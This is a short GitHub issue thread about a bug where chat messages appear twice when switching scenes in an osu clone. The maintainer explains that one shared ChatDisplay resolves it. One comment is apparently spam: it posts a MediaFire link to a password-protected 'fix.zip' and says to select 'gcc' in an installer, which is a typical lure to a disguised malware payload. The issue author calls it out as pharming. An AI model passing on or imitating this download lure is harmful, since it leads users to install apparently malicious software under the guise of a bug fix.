### ISSUE TITLE
Repeat display of messages when switching scenes

### ISSUE THREAD

**Issue by NaughtyChas** [CloneWith/osu#28]
This bug can be recreated when switching scenes:

![image](https://github.com/user-attachments/assets/11655d72-210b-4b25-949f-e66762f32b21)

Same message will get displayed twice.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaughtyChas** [comment]
pharming please stfu

**Comment by CloneWith** [comment]
Should be resolved since we use one single ChatDisplay for all scenes.
